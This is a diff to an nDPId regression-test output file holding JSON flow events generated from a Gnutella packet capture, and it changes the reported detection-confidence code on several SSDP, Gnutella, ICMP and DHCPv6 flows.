00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3838,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":2,"flow_last_seen":252481,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":252481,"pkt":"CAAn5uVZUlQAEjUCCABFAAFMCiwAAEAROsxyGLaCCgACD1bYcAkBOFVRR05EAXxtAQF4nOvJYQx09GAJCV7MpZrkwOFSJLGt6UbYMQYgUyupuGFR9A4Q89baZ0k2XvtBzNP3+FapRIMV3Fqi\/rI88ASIWaTGGTQ\/7jCIqfL+6qRvIftAzDutVTcXRR8HMavP1qV5ioC13XbXqbSz2A5W0Jm1NlN3L0TbImkjeYi2tuVBe8QOgZjrt6lzbzQ6AGZunfPFXkEZxCz\/zvboo6oamPltsscdQTDT9o7mx6liTGCnM9nJfJZQABvWr\/Qw3U8FxNy+OaqgRk0brI2v\/+2iaAawNoeNpoui+UDMU9PtrU\/ICoKYjAsDgi4oyoFd9pL5voERI4MDWzDENiDjtpuBeJs8kAHxLZAB8SCc4cES5KjDyMDAEKv\/yNSQiSFF6sinl36cBfwAxlh+fA=="} -00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":65065,"flow_last_seen":65065,"flow_idle_time":200000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":1042,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57623,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":65065,"flow_last_seen":65065,"flow_idle_time":200000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":1042,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57623,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71535,"flow_last_seen":71535,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.160.214.137","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71535,"flow_last_seen":71535,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.160.214.137","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71536,"flow_last_seen":71536,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.133.122.217","src_port":28681,"dst_port":23458,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1763,7 +1763,7 @@ 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71540,"flow_last_seen":71540,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"154.3.42.104","src_port":28681,"dst_port":11804,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71537,"flow_last_seen":71537,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.205.126.102","src_port":28681,"dst_port":5193,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71537,"flow_last_seen":71537,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.205.126.102","src_port":28681,"dst_port":5193,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":126831,"flow_last_seen":130215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10878,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":126831,"flow_last_seen":130215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10878,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71538,"flow_last_seen":71538,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.39.154.69","src_port":28681,"dst_port":4832,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71538,"flow_last_seen":71538,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.39.154.69","src_port":28681,"dst_port":4832,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":70230,"flow_last_seen":70230,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.210.244.72","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1772,7 +1772,7 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71540,"flow_last_seen":71540,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.239.213.146","src_port":28681,"dst_port":21750,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71536,"flow_last_seen":71536,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.38.9.82","src_port":28681,"dst_port":24223,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71536,"flow_last_seen":71536,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.38.9.82","src_port":28681,"dst_port":24223,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00630{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129210,"flow_last_seen":129210,"flow_idle_time":140000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"84.197.97.94","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00630{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129210,"flow_last_seen":129210,"flow_idle_time":140000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"84.197.97.94","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71538,"flow_last_seen":71538,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"202.151.63.59","src_port":28681,"dst_port":7624,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71538,"flow_last_seen":71538,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"202.151.63.59","src_port":28681,"dst_port":7624,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71537,"flow_last_seen":71537,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.134.167.82","src_port":28681,"dst_port":5820,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1825,7 +1825,7 @@ 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72851,"flow_last_seen":72851,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.225.140.186","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72850,"flow_last_seen":72850,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.191.49.159","src_port":28681,"dst_port":1024,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72850,"flow_last_seen":72850,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.191.49.159","src_port":28681,"dst_port":1024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":12461,"flow_last_seen":75501,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":637,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":12461,"flow_last_seen":75501,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":637,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72851,"flow_last_seen":72851,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"79.86.173.45","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72851,"flow_last_seen":72851,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"79.86.173.45","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00562{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":72852,"flow_last_seen":131670,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.231.73.14","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -1937,49 +1937,49 @@ 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82065,"flow_last_seen":82065,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.126.240.32","src_port":28681,"dst_port":45313,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82065,"flow_last_seen":82065,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.134.139.39","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82065,"flow_last_seen":82065,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.134.139.39","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":89829,"flow_last_seen":174528,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.84.178.16","src_port":28681,"dst_port":60262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":89829,"flow_last_seen":174528,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.84.178.16","src_port":28681,"dst_port":60262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82059,"flow_last_seen":251735,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.59.253.186","src_port":28681,"dst_port":15555,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82062,"flow_last_seen":251737,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.172.15.182","src_port":28681,"dst_port":37829,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00563{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82062,"flow_last_seen":191703,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.239.62.213","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90005,"flow_last_seen":243646,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4494,"flow_avg_l4_payload_len":321,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90072,"flow_last_seen":163183,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.26.216.95","src_port":28681,"dst_port":13889,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90005,"flow_last_seen":243646,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4494,"flow_avg_l4_payload_len":321,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90072,"flow_last_seen":163183,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.26.216.95","src_port":28681,"dst_port":13889,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82063,"flow_last_seen":253025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"177.231.151.16","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 